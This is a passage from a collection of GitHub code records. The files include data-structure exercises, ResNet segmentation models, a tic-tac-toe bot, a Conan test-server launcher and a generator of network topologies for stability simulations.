insert(self, element):\n datum = element[0]\n priority = element[1]\n if datum in self._locations:\n self._change_priority(datum, priority)\n return\n if self._length + 1 == len(self._data):\n self._resize(2 * len(self._data))\n self._length += 1\n self._data[self._length] = [datum, priority]\n self._locations[datum] = self._length\n self._bubble_up(self._length)\n\n def delete(self):\n top_datum = self._data[1][0]\n del self._locations[top_datum] \n self._data[1], self._data[self._length] = self._data[self._length], self._data[1]\n self._length -= 1\n if MIN_CAPACITY <= self._length <= len(self._data) // 4:\n self._resize(len(self._data) // 2)\n self._bubble_down(1)\n return top_datum\n\n def _change_priority(self, datum, priority):\n i = self._locations[datum]\n if priority > self._data[i][1]:\n self._data[i][1] = priority\n self._bubble_up(i)\n elif priority < self._data[i][1]:\n self._data[i][1] = priority\n self._bubble_down(i)\n self._bubble_up(i)\n \n def _bubble_up(self, i):\n if i > 1 and self._data[i][1] > self._data[i // 2][1]:\n self._data[i // 2], self._data[i] = self._data[i], self._data[i // 2]\n self._locations[self._data[i // 2][0]] = i // 2\n self._locations[self._data[i][0]] = i\n self._bubble_up(i // 2)\n\n def _bubble_down(self, i):\n child = 2 * i\n if child < self._length and self._data[child + 1][1] > self._data[child][1]:\n child += 1\n if child <= self._length and self._data[child][1] > self._data[i][1]:\n self._data[child], 
self._data[i] = self._data[i], self._data[child]\n self._locations[self._data[child][0]] = child\n self._locations[self._data[i][0]] = i\n self._bubble_down(child)\n\n def _resize(self, new_size):\n self._data = list(self._data[ : self._length + 1]) + [None] * (new_size - self._length - 1)\n \n\nif __name__ == '__main__':\n pq = PriorityQueue()\n L = [('A', 13), ('B', 13), ('C', 4), ('D', 15), ('E', 9), ('F', 4), ('G', 5), ('H', 14),\n ('A', 4), ('B', 11), ('C', 15), ('D', 2), ('E', 17),\n ('A', 8), ('B', 14), ('C',12), ('D', 9), ('E', 5),\n ('A', 6), ('B', 16)]\n for e in L:\n pq.insert(e)\n for i in range(8):\n print(pq.delete(), end = ' ')\n print()\n print(pq.is_empty())\n \n \n \n","repo_name":"iteong/comp9021-principles-of-programming","sub_path":"labs/Lab_11_solutions/extended_priority_queue.py","file_name":"extended_priority_queue.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"6"} +{"seq_id":"28556915084","text":"def factorial(n):\n # n! can also be fined as n * (n-1)\n\n if n <= 1:\n return 1\n else:\n return n * factorial(n - 1)\n\n\ntry:\n print(factorial(900))\nexcept (RecursionError, OverflowError):\n print(\"This program can't calculate factorials that large\")\n\nprint(\"Program done\")\n","repo_name":"ndrichter/udemy_python","sub_path":"exception_handling/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23155483860","text":"# import torch\n# import torch.nn as nn\n# import torch.optim as optim\n# import torch.nn.functional as F\n# import torchvision\n# import torchvision.transforms as transforms\n# from torch.utils.data import Dataset, DataLoader\n# import torchvision.models as models\n# import glob\n# import os.path as osp\n\n# class Resnet18(nn.Module):\n# def __init__(self):\n \n# super(Resnet18, self).__init__()\n \n# # Load the pretrained weights\n# resnet18 = models.resnet18(pretrained=True)\n# #took out last block, avgpool, and linear layer of ResNet 18\n# modules = list(resnet18.children())[0:7]\n# # last block of Resnet 18\n# modules += [nn.Conv2d(256, 512, kernel_size=(1, 1), stride=(2, 2), bias=False),\n# nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),\n# nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),\n# nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),\n# nn.ReLU(),\n# nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),\n# nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)]\n# self.resnet18=nn.Sequential(*modules)\n# self.upsample1 = nn.ConvTranspose2d(512, 512, 3, stride=4, padding = 2)\n# self.conv1 = nn.Conv2d(512, 256, (3, 3), padding = 1, bias=True)\n# self.relu1 = nn.ReLU()\n# self.conv2 = nn.Conv2d(256, 256, (3, 3), padding = 1, bias=True)\n# self.relu2 = nn.ReLU()\n# self.upsample2 = nn.ConvTranspose2d(256, 256, 3, stride=2)\n# self.conv3 = nn.Conv2d(256, 128, (3, 3), padding = 1, bias=True)\n# self.relu3 = nn.ReLU()\n# self.conv4 = nn.Conv2d(128, 128, (3, 3), padding = 1, bias=True)\n# self.relu4 = nn.ReLU()\n# self.upsample3 = nn.ConvTranspose2d(128, 128, 3, stride=2)\n# self.conv5 = nn.Conv2d(128, 64, (3, 3), padding = 1, bias=True)\n# self.relu5 = nn.ReLU()\n# self.conv6 = nn.Conv2d(64, 64, (3, 3), padding = 1, bias=True)\n# self.relu6 = nn.ReLU()\n# 
self.upsample4 = nn.ConvTranspose2d(64, 35, 3, stride=2)\n \n \n# def forward(self, x):\n \n# input_spatial_dim = x.size()[2:]\n \n# x = self.resnet18(x)\n# x = self.upsample1(x)\n# x = self.conv1(x)\n# x = self.relu1(x)\n# x = self.conv2(x)\n# x = self.relu2(x)\n# x = self.upsample2(x)\n# x = self.conv3(x)\n# x = self.relu3(x)\n# x = self.conv4(x)\n# x = self.relu4(x)\n# x = self.upsample3(x)\n# x = self.conv5(x)\n# x = self.relu5(x)\n# x = self.conv6(x)\n# x = self.relu6(x) \n# x = self.upsample4(x)\n# x = nn.functional.upsample(input = x, size = input_spatial_dim, mode = 'bilinear', align_corners = True)\n# return x\n \n \nimport torch\nimport torch.nn as nn\nimport torchvision\n\n\nclass Resnet18_8s(nn.Module):\n \n # Achieved ~57 on pascal VOC\n \n def __init__(self, num_classes=35):\n \n super(Resnet18_8s, self).__init__()\n \n # Load the pretrained weights, remove avg pool\n # layer and get the output stride of 8\n self.resnet18 = torchvision.models.resnet18(pretrained=True)\n modules = list(self.resnet18.children())[0:-1]\n resnet18_32s=nn.Sequential(*modules)\n \n \n # Create a linear layer -- we don't need logits in this case\n resnet18_32s.fc = nn.Sequential()\n \n self.resnet18_32s = resnet18_32s\n \n self.score_32s = nn.Conv2d(512,\n num_classes,\n kernel_size=1)\n \n self.score_16s = nn.Conv2d(256,\n num_classes,\n kernel_size=1)\n \n self.score_8s = nn.Conv2d(128,\n num_classes,\n kernel_size=1)\n \n \n def forward(self, x):\n \n input_spatial_dim = x.size()[2:]\n \n x = self.resnet18.conv1(x)\n x = self.resnet18.bn1(x)\n x = self.resnet18.relu(x)\n x = self.resnet18.maxpool(x)\n\n x = self.resnet18.layer1(x)\n \n x = self.resnet18.layer2(x)\n logits_8s = self.score_8s(x)\n \n x = self.resnet18.layer3(x)\n logits_16s = self.score_16s(x)\n \n x = self.resnet18.layer4(x)\n logits_32s = self.score_32s(x)\n \n logits_16s_spatial_dim = logits_16s.size()[2:]\n logits_8s_spatial_dim = logits_8s.size()[2:]\n \n logits_16s += nn.functional.upsample(logits_32s,\n size=logits_16s_spatial_dim, mode = 'bilinear', align_corners = True)\n \n logits_8s += nn.functional.upsample(logits_16s,\n size=logits_8s_spatial_dim, mode = 'bilinear', align_corners = True)\n \n logits_upsampled = nn.functional.upsample(input = logits_8s,\n size=input_spatial_dim, mode = 'bilinear', align_corners = True)\n \n return logits_upsampled\n\n \nclass Resnet50_8s(nn.Module):\n \n \n def __init__(self, num_classes=35):\n \n super(Resnet50_8s, self).__init__()\n \n \n # Load the pretrained weights, remove avg pool\n # layer and get the output stride of 8\n self.resnet50 = torchvision.models.resnet50(pretrained=True)\n modules = list(self.resnet50.children())[0:-1]\n resnet50_32s=nn.Sequential(*modules)\n \n \n # Create a linear layer -- we don't need logits in this case\n resnet50_32s.fc = nn.Sequential()\n \n self.resnet50_32s = resnet50_32s\n \n self.score_32s = nn.Conv2d(2048 ,\n num_classes,\n kernel_size=1)\n \n self.score_16s = nn.Conv2d(1024,\n num_classes,\n kernel_size=1)\n \n self.score_8s = nn.Conv2d(512,\n num_classes,\n kernel_size=1)\n \n \n def forward(self, x):\n \n input_spatial_dim = x.size()[2:]\n \n x = self.resnet50.conv1(x)\n x = self.resnet50.bn1(x)\n x = self.resnet50.relu(x)\n x = self.resnet50.maxpool(x)\n\n x = self.resnet50.layer1(x)\n \n x = self.resnet50.layer2(x)\n logits_8s = self.score_8s(x)\n \n x = self.resnet50.layer3(x)\n logits_16s = self.score_16s(x)\n \n x = self.resnet50.layer4(x)\n logits_32s = self.score_32s(x)\n \n logits_16s_spatial_dim = logits_16s.size()[2:]\n 
logits_8s_spatial_dim = logits_8s.size()[2:]\n        \n        logits_16s += nn.functional.upsample(logits_32s,\n                                        size=logits_16s_spatial_dim, mode = 'bilinear', align_corners = True)\n        \n        logits_8s += nn.functional.upsample(logits_16s,\n                                        size=logits_8s_spatial_dim, mode = 'bilinear', align_corners = True)\n        \n        logits_upsampled = nn.functional.upsample(logits_8s, size=input_spatial_dim, mode = 'bilinear', align_corners = True)\n        \n        return logits_upsampled","repo_name":"Ameliabqy/CS231N_Project","sub_path":"code/models/ResNet.py","file_name":"ResNet.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31534018786","text":"needed_money = int(input())\npayment = 1\ntotal_payments_amount = 0\namount_payment_cash = 0\namount_payment_card = 0\ncash_payments = 0\ncard_payments = 0\naverage_cash_payments = 0\naverage_card_payments = 0\ncurrent_item_price = input()\nwhile current_item_price != \"End\" and total_payments_amount < needed_money:\n    item_price = int(current_item_price)\n    if payment == 1:\n        if item_price > 100:\n            print(\"Error in transaction!\")\n            payment += 1\n        else:\n            print(\"Product sold!\")\n            amount_payment_cash += item_price\n            total_payments_amount += item_price\n            payment += 1\n            cash_payments += 1\n    elif payment == 2:\n        if item_price < 10:\n            print(\"Error in transaction!\")\n            payment = 1\n        else:\n            print(\"Product sold!\")\n            amount_payment_card += item_price\n            total_payments_amount += item_price\n            card_payments += 1\n            payment = 1\n    if total_payments_amount < needed_money:\n        current_item_price = input()\nif total_payments_amount < needed_money:\n    print(\"Failed to collect required money for charity.\")\nelif total_payments_amount >= needed_money:\n    average_cash_payments = amount_payment_cash / cash_payments\n    average_card_payments = amount_payment_card / card_payments\n    print(f\"Average CS: {average_cash_payments:.2f}\")\n    print(f\"Average CC: {average_card_payments:.2f}\")\n","repo_name":"iliyan-pigeon/Soft-uni-Courses","sub_path":"programming_basics_python/while_loops_more_exercises/report_system.py","file_name":"report_system.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25081101460","text":"from person import Person\n\nclass Student(Person): # A student is a person, so it inherits from the base Person class\n    faculty = None\n    marks = None # Marks are stored as a dictionary: the key is a subject, the value is a list of marks\n\n    def __init__(self, name: str, year: int, id: int, faculty: str, subject_list: list=None) -> None:\n        super().__init__(name, year, id) # First call the parent class init to set the basic person attributes\n        self.faculty = faculty\n        self.marks = dict()\n        if subject_list is not None: # If a subject list is given when the student is created, also initialize those subjects in the mark book\n            for subject in subject_list:\n                self.add_subject(subject)\n\n    \n    def add_subject(self, subject: str): # Method for enrolling in a subject, i.e. adding it to the mark book\n        self.marks[subject] = list()\n\n    def get_marks(self):\n        print(f\"{self.name}'s marks:\")\n        for subject in self.marks.keys():\n            print(f'{subject}: {self.marks[subject]}')\n    \n\nclass Teacher(Person): # Teacher class. Needed for interacting with students\n    subject = None # The subject that is taught. 
The value is used when giving marks to students\n\n    def __init__(self, name: str, year: int, id: int, subject: str) -> None:\n        super().__init__(name, year, id)\n        self.subject = subject\n\n    def give_mark(self, student: Student, mark: int):\n        if self.subject not in student.marks: # Check whether the student is enrolled in the subject taught by this teacher\n            print('The student does not take this subject!')\n            return\n        student.marks[self.subject].append(mark) # The mark is entered into the student's mark book\n    \n\n\nclass Assistant(Teacher, Student): # An inheritance example - an assistant, who is both a student and a teacher of a particular subject\n    def __init__(self, name: str, year: int, id: int, faculty: str, subject: str, subject_list: list = None) -> None:\n        Student.__init__(self, name=name, year=year, id=id, faculty=faculty, subject_list=subject_list) # In this case it is simplest to call the student constructor and fill in the teacher fields here\n        self.subject = subject # The name, id and the other parameters are initialized once, so the student fields are set first and the teacher's own fields are added afterwards. The teacher constructor could be called instead, but then the student fields would have to be defined here\n","repo_name":"MVShukhman/Python_course","sub_path":"13 - OOP/school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10770427890","text":"# Problem 2588\na, b = map(int, input().split())\n\nprint(a * ((b) % 10))\nprint(a * ((b//10) % 10))\nprint(a * (b//100))\nprint(a*b)\n\n\n# Problem 2884\n\na, b = map(int, input().split())\n\nif b >= 45:\n    print(a, b - 45)\nelif a > 0 and b < 45:\n    print(a - 1, b + 15)\nelse:\n    print(a + 23, b + 15)\n\n\n# Problem 1110\n# e.g. 26: 2 + 6 = 8 => 68\n\n# first_num % 10 is 6, first_num // 10 is 2\n# second_num = ((first_num % 10)*10) + (first_num // 10 + first_num % 10)\n\nnum = int(input())\n\ncheck_num = num\nnew = 0\na = 0\ncount = 0\n\nwhile True:\n    a = num // 10 + num % 10\n    new = (num % 10)*10 + a % 10\n    count += 1\n    num = new\n\n    if new == check_num:\n        break\n\nprint(count)\n","repo_name":"noh-yj/algorithm","sub_path":"1_week/prac1.py","file_name":"prac1.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25869938649","text":"from random import randint\n\n\nclass TicTacToe:\n    \n    \"\"\"\n    Class describing a game of tic-tac-toe.\n    \"\"\"\n\n    CROSS = '❌'\n\n    \"\"\"\n    Constant holding the cross symbol.\n    \"\"\"\n\n    ZERO = '🟢'\n\n    \"\"\"\n    Constant holding the nought symbol.\n    \"\"\"\n\n    EMPTY = ' '\n\n    \"\"\"\n    Constant holding the empty cell symbol.\n    \"\"\"\n\n    WIN = 'win'\n\n    \"\"\"\n    The player won.\n    \"\"\"\n\n    LOSE = 'lose'\n\n    \"\"\"\n    The player lost.\n    \"\"\"\n\n    STOP = 'stop'\n\n    \"\"\"\n    The game is over.\n    \"\"\"\n\n    DRAW = 'draw'\n\n    \"\"\"\n    Draw.\n    \"\"\"\n\n    NONE = 'none'\n\n    \"\"\"\n    The game continues.\n    \"\"\"\n\n    __id: int\n\n    \"\"\"\n    Game identifier.\n    \"\"\"\n\n    __field: list[str]\n\n    \"\"\"\n    List holding the values of the cells of the game board.\n    \"\"\"\n\n    __sign: str\n\n    \"\"\"\n    The player's symbol.\n    \"\"\"\n\n    __field_size: int\n\n    \"\"\"\n    Side length of the game board\n    \"\"\"\n\n    __lines: list[list[int]]\n\n    \"\"\"\n    List holding the lines used to check whether the game has ended.\n    \"\"\"\n\n    __win_line: int\n\n    \"\"\"\n    Number of cells in a row needed to win.\n    \"\"\"\n\n    def __init__(self, \n                 id: int, \n                 field: list[str] = None, 
\n                 sign: str = None, \n                 field_size: int = 3, \n                 win_line: int = 3) -> None:\n\n        \"\"\"\n        Initialize a game object.\n        \"\"\"\n\n        self.__id = id\n        self.__field = field if field is not None else [TicTacToe.EMPTY] * field_size * field_size\n        self.__field_size = int(len(self.__field) ** 0.5)\n\n        self.__win_line = win_line\n        \n        self.__lines = []\n\n        for i in range(0, len(self.__field), self.__field_size):\n            self.__lines.append(list(range(i, i + self.__field_size)))\n\n        for i in range(0, self.__field_size):\n            self.__lines.append(list(range(i, len(self.__field), self.__field_size)))\n\n        starts = [i for i in range(self.__field_size - self.__win_line + 1)]\n        for i in range(len(starts)):\n            self.__lines.append([j for j in range(starts[i], len(self.__field), self.__field_size + 1)][0:self.__field_size - i])\n        \n        starts = [i for i in list(range(self.__field_size, len(self.__field), self.__field_size))[0:self.__field_size - self.__win_line]]\n        for i in range(len(starts)):\n            self.__lines.append([j for j in range(starts[i], len(self.__field), self.__field_size + 1)][0:self.__field_size - i])\n        \n        starts = [i for i in range(self.__win_line - 1, self.__field_size)]\n        for i in range(len(starts)):\n            self.__lines.append([j for j in range(starts[i], len(self.__field), self.__field_size - 1)][0:self.__field_size + i - (self.__field_size - self.__win_line)])\n\n        starts = [i for i in list(range(self.__field_size - 1, len(self.__field), self.__field_size))[1:self.__field_size - (self.__win_line - 1)]]\n        for i in range(len(starts)):\n            self.__lines.append([j for j in range(starts[i], len(self.__field), self.__field_size - 1)][0:self.__field_size - i])\n        \n        \n        if sign is None:\n            self.__sign = TicTacToe.CROSS if randint(0, 1) == 1 else TicTacToe.ZERO\n            if self.__sign == TicTacToe.ZERO:\n                self.__bot_move()\n        else:\n            self.__sign = sign\n\n\n    def get_id(self) -> int:\n\n        \"\"\"\n        Method returning the game identifier.\n        \"\"\"\n\n        return self.__id\n\n\n    def get_field(self) -> list[str]:\n\n        \"\"\"\n        Method returning the game board.\n        \"\"\"\n\n        return self.__field.copy()\n\n\n    def is_active(self) -> bool:\n\n        \"\"\"\n        Check the state of the game. 
Returns False if the game is over.\n        \"\"\"\n\n        return self.__check() == TicTacToe.NONE\n\n\n    def get_sign(self) -> str:\n\n        \"\"\"\n        Method returning the player's symbol.\n        \"\"\"\n\n        return self.__sign\n\n    def get_win_line(self) -> int:\n\n        \"\"\"\n        Method returning the number of cells in a row needed to win.\n        \"\"\"\n\n        return self.__win_line\n    \n\n    def move(self, index: int) -> str:\n\n        \"\"\"\n        Player move method.\n        \"\"\"\n\n        result = self.__check()\n        if result != TicTacToe.NONE:\n            return TicTacToe.STOP\n\n        if index not in range(len(self.__field)) or self.__field[index] != TicTacToe.EMPTY:\n            return TicTacToe.NONE\n\n        self.__field[index] = self.__sign\n        result = self.__check()\n        if result == TicTacToe.DRAW:\n            return result\n        elif result == TicTacToe.STOP:\n            return TicTacToe.WIN\n\n        self.__bot_move()\n        result = self.__check()\n        if result == TicTacToe.DRAW:\n            return result\n        elif result == TicTacToe.STOP:\n            return TicTacToe.LOSE\n\n        return TicTacToe.NONE\n\n\n    def __bot_move(self) -> None:\n\n        \"\"\"\n        Bot move method.\n        \"\"\"\n\n        bot_sign = TicTacToe.CROSS if self.__sign != TicTacToe.CROSS else TicTacToe.ZERO\n\n        moves = []\n        for i in range(1, self.__win_line):\n            moves.insert(0, (self.__sign, i))\n            moves.insert(0, (bot_sign, i))\n\n        for move in moves:\n            result = self.__find_cell(move[0], move[1])\n            if len(result) != 0:\n                self.__field[result[randint(0, len(result) - 1)]] = bot_sign\n                return\n\n        while True:\n            num = randint(0, len(self.__field) - 1)\n            if self.__field[num] == TicTacToe.EMPTY:\n                self.__field[num] = bot_sign\n                return\n\n\n    def __find_cell(self, sign: str, sign_count: int) -> list[int]:\n\n        \"\"\"\n        Find the best move for the bot.\n        \"\"\"\n\n        other = TicTacToe.CROSS if sign == TicTacToe.ZERO else TicTacToe.ZERO\n\n        empties = []\n        for line in self.__lines:\n            for i in range(len(line) - (self.__win_line - 1)):\n                cells = line[i:i+self.__win_line]\n                temp = list(map(lambda j: self.__field[j], cells))\n                if other not in temp and len(list(filter(lambda k: k == sign, temp))) == sign_count:\n                    empties += list(filter(lambda l: self.__field[l] == TicTacToe.EMPTY, cells))\n\n        return empties\n\n\n    def __check(self) -> str:\n\n        \"\"\"\n        Method checking the current state of the game.\n        \"\"\"\n        \n        for line in self.__lines:\n            for i in range(len(line) - (self.__win_line - 1)):\n                temp = list(set(map(lambda j: self.__field[j], line[i:i+self.__win_line])))\n                if len(temp) == 1 and temp[0] != TicTacToe.EMPTY:\n                    return TicTacToe.STOP\n\n        temp = list(set(self.__field))\n        if len(temp) == 2 and TicTacToe.EMPTY not in temp:\n            return TicTacToe.DRAW\n\n        return TicTacToe.NONE","repo_name":"ivankopanyov/TicTacToeBot","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":7444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10129629539","text":"\n# Creating the array of lists structure\nAMOUNT_OF_BUCKETS = 5\nhashtable = []\nfor i in range(AMOUNT_OF_BUCKETS):\n    hashtable.append([]) #O(1)\n\n\n# O(M) where M is the amount of letters\ndef hashFunction(text):\n    ret = 0\n    for letter in text:\n        ret += int(ord(letter))\n    \n    return ret%AMOUNT_OF_BUCKETS\n\n\ndef insertElement(text, value):\n    pos = hashFunction(text) #O(M)\n    hashtable[pos].append( (text, value)) #O(1)\n\ndef deleteElement(text):\n    pos = hashFunction(text) #O(M)\n\n    #O(N) where N is the amount of elements on the same bucket\n    for storedTuple in hashtable[pos]:\n        if storedTuple[0] == text:\n            hashtable[pos].remove(storedTuple)\n            break\n\ndef getValue(text):\n    pos = 
hashFunction(text) #O(M)\n \n #O(N) where N is the amount of elements on the same bucket\n for storedTuple in hashtable[pos]:\n if storedTuple[0] == text:\n return storedTuple[1]\n\n\ninsertElement(\"BEATRIZ\", 10)\ninsertElement(\"CAIO\", 20)\ninsertElement(\"GUSTAVO\", 30)\ninsertElement(\"ITALO\", 40)\ninsertElement(\"LUCAS\", 50)\n\nprint(hashtable)\nprint(\"Qual valor de ITALO? \")\nprint(getValue(\"ITALO\"))","repo_name":"nekiter/RoadToRedCoder","sub_path":"data_structures_implementation/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2855977208","text":"#!/usr/bin/python\nfrom conans.server.service.authorize import BasicAuthorizer, BasicAuthenticator\nimport os\nfrom conans.server.conf import get_file_manager\nfrom conans.server.rest.server import ConanServer\nfrom conans.server.crypto.jwt.jwt_credentials_manager import JWTCredentialsManager\nfrom conans.server.crypto.jwt.jwt_updown_manager import JWTUpDownAuthManager\nfrom conans.util.log import logger\nfrom conans.util.files import mkdir\nfrom conans.test.utils.test_files import temp_folder\nfrom conans.server.migrate import migrate_and_get_server_config\nfrom conans.search import DiskSearchAdapter, DiskSearchManager\nfrom conans.paths import SimplePaths\n\n\nTESTING_REMOTE_PRIVATE_USER = \"private_user\"\nTESTING_REMOTE_PRIVATE_PASS = \"private_pass\"\n\n\nclass TestServerLauncher(object):\n port = 0\n\n def __init__(self, base_path=None, read_permissions=None,\n write_permissions=None, users=None, base_url=None, plugins=None,\n server_version=None,\n min_client_compatible_version=None):\n\n plugins = plugins or []\n if not base_path:\n base_path = temp_folder()\n\n if not os.path.exists(base_path):\n raise Exception(\"Base path not exist! 
%s\")\n\n # Define storage_folder, if not, it will be readed from conf file and pointed to real user home\n storage_folder = os.path.join(base_path, \".conan_server\", \"data\")\n mkdir(storage_folder)\n\n server_config = migrate_and_get_server_config(base_path, storage_folder)\n\n if TestServerLauncher.port == 0:\n TestServerLauncher.port = server_config.port\n\n # Encode and Decode signature for Upload and Download service\n updown_auth_manager = JWTUpDownAuthManager(server_config.updown_secret,\n server_config.authorize_timeout)\n self.file_manager = get_file_manager(server_config, public_url=base_url,\n updown_auth_manager=updown_auth_manager)\n\n search_adapter = DiskSearchAdapter()\n self.search_manager = DiskSearchManager(SimplePaths(server_config.disk_storage_path), search_adapter)\n # Prepare some test users\n if not read_permissions:\n read_permissions = server_config.read_permissions\n read_permissions.append((\"private_library/1.0.0@private_user/testing\", \"*\"))\n read_permissions.append((\"*/*@*/*\", \"*\"))\n\n if not write_permissions:\n write_permissions = server_config.write_permissions\n\n if not users:\n users = dict(server_config.users)\n\n users[TESTING_REMOTE_PRIVATE_USER] = TESTING_REMOTE_PRIVATE_PASS\n\n authorizer = BasicAuthorizer(read_permissions, write_permissions)\n authenticator = BasicAuthenticator(users)\n credentials_manager = JWTCredentialsManager(server_config.jwt_secret,\n server_config.jwt_expire_time)\n\n logger.debug(\"Storage path: %s\" % storage_folder)\n self.port = TestServerLauncher.port\n TestServerLauncher.port += 1\n self.ra = ConanServer(self.port, False, credentials_manager, updown_auth_manager,\n authorizer, authenticator, self.file_manager, self.search_manager, \n server_version, min_client_compatible_version)\n for plugin in plugins:\n self.ra.api_v1.install(plugin)\n\n def start(self, daemon=True):\n \"\"\"from multiprocessing import Process\n self.p1 = Process(target=ra.run, kwargs={\"host\": \"0.0.0.0\"})\n self.p1.start()\n self.p1\"\"\"\n import threading\n self.t1 = threading.Thread(target=self.ra.run, kwargs={\"host\": \"0.0.0.0\"})\n self.t1.daemon = daemon\n self.t1.start()\n\n def stop(self):\n self.ra.root_app.close()\n\n\nif __name__ == \"__main__\":\n server = TestServerLauncher()\n server.start(daemon=False)\n","repo_name":"AversivePlusPlus/AversivePlusPlus","sub_path":"tools/conan/conans/server/test/utils/server_launcher.py","file_name":"server_launcher.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"6"} +{"seq_id":"73026326587","text":"'''\nCreates 3 generic simple example topologies, traffic matrices, and paths\nfor testing with Ripple, and Ripple + ONSET\n\nLinear graph.\n\nseries of 3 or more links.\nA <-> B <-> C\n\nMesh.\n4 by 4 grid topology.\nA <-> B <-> C <-> D\n^ ^ ^ ^\n| | | |\nv v v v\nE <-> F <-> G <-> H\n...\n\nDumbbell.\nLinear topology with whiskers.\nA F\n \\ /\n \\ /\nB---D <-> E---G\n / \\\n / \\\nC H\n'''\n\n# library for creating graphs. 
\nimport networkx as nx\nfrom networkx.algorithms.centrality.reaching import local_reaching_centrality\n\n# creating traffic matrices\nfrom onset.utilities.tmg import rand_gravity_matrix\nfrom attacker import read_tm_to_tc, Attacker\n\n# json writing utilities\nfrom onset.utilities.matrix_to_json_flows import write_flows_to_json\nfrom onset.utilities.paths_to_json import convert_paths_onset_to_json\nfrom onset.utilities.write_gml import write_gml\n\ndef get_linear_topo(n_links:int) -> nx.Graph:\n    # creates and returns linear topology with n_links\n    # series of 3 or more links.\n    # e.g., A <-> B <-> C\n\n    G = nx.Graph()\n    my_nodes = ['s{}'.format(n+1) for n in range(n_links+1)]\n    i = 0\n    for u, v in zip(my_nodes, my_nodes[1:]):\n        G.add_edge(u, v, capacity=100)\n        G.nodes[u][\"Longitude\"] = i\n        G.nodes[u][\"Latitude\"] = 0\n        i += 1\n\n    G.nodes[my_nodes[-1]][\"Longitude\"] = i\n    G.nodes[my_nodes[-1]][\"Latitude\"] = 0\n    \n    return G\n\ndef get_dumbbell_topo(n_span_hops:int, n_whiskers) -> nx.Graph:\n    # creates and returns a dumbbell topology with n_span_hops links in the middle and n_whiskers on each end.\n    # Linear topology with whiskers\n    # e.g., \n    # get_dumbbell_topo(n_span_hops=1, n_whiskers=3).\n    # A         F\n    #  \\       /\n    #   \\     /\n    # B---D <-> E---G\n    #   /     \\\n    #  /       \\\n    # C         H\n\n    G = nx.Graph()\n    \n    nodes = ['s{}'.format(n + 1) for n in range( 2*(n_whiskers+1) + (n_span_hops - 1) )]\n    \n    left_whisk_nodes = nodes[:n_whiskers]\n    left_span_node = nodes[n_whiskers]\n    span_nodes = nodes[n_whiskers:-n_whiskers]\n    right_span_node = nodes[-n_whiskers-1]\n    right_whisk_nodes = nodes[-n_whiskers:]\n    \n    mid_latitude = n_whiskers / 2 \n    longitude = 0\n\n    for i, lwn in enumerate(left_whisk_nodes):\n        G.add_edge(lwn, left_span_node, capacity=100)\n        G.nodes[lwn]['Latitude'] = i\n        G.nodes[lwn]['Longitude'] = longitude\n    \n    # Left whiskers placed, move longitude.\n    longitude += 1 \n    G.nodes[left_span_node]['Longitude'] = longitude\n    G.nodes[left_span_node]['Latitude'] = mid_latitude \n    \n\n    # first span node placed, move longitude\n    longitude += 1 \n\n    for u, v in zip(span_nodes, span_nodes[1:]):\n        G.add_edge(u, v, capacity=100)\n        G.nodes[v]['Longitude'] = longitude\n        G.nodes[v]['Latitude'] = mid_latitude\n    \n    \n    # after each span hop is placed, move longitude\n    longitude += 1\n\n    for i, rwn in enumerate(right_whisk_nodes):\n        G.add_edge(right_span_node, rwn, capacity=100)\n        G.nodes[rwn]['Longitude'] = longitude\n        G.nodes[rwn]['Latitude'] = i\n    \n    return G \n\ndef get_grid_topo(grid_dimension) -> nx.Graph:\n    G = nx.generators.grid_graph(dim=(grid_dimension, grid_dimension))\n    nx.set_edge_attributes(G, 100, 'capacity')\n    for (x, y) in G.nodes():\n        G.nodes[(x,y)][\"Longitude\"] = x\n        G.nodes[(x,y)][\"Latitude\"] = y\n    \n    labels = {node : 's{}'.format(i+1) for i, node in enumerate(G.nodes())}\n    nx.relabel_nodes(G, labels,copy=False)\n    return G\n\n\ndef main():\n    # Step 1: create graphs.\n    GRAPH_FOLDER = \"/home/matt/network_stability_sim/data/graphs/gml/\"\n    linear_length = 10\n    linear_G = get_linear_topo(linear_length)\n\n    whiskers, span_hops = 3, 2\n    dumbbell_G = get_dumbbell_topo(n_whiskers=whiskers, n_span_hops=span_hops)\n    \n    grid_dim = 3\n    grid_G = get_grid_topo(grid_dim)\n    linear_topo_file = GRAPH_FOLDER + \"linear_\" + str(linear_length) + \".gml\"\n    dumbbell_topo_file = GRAPH_FOLDER + \"dumbbell_\" + str(whiskers) + \"_\" + str(span_hops) + \".gml\"\n    grid_topo_file = GRAPH_FOLDER + \"grid_\" + str(grid_dim) + \".gml\"\n    write_gml(linear_G, linear_topo_file)\n    print('wrote graph to: ' + linear_topo_file)\n    \n    write_gml(dumbbell_G, dumbbell_topo_file)\n    print('wrote graph to: ' + dumbbell_topo_file)\n\n    write_gml(grid_G, grid_topo_file)\n    print('wrote graph to: ' + grid_topo_file)\n    \n    # Step 2: Create traffic flows for benign and attack traffic. 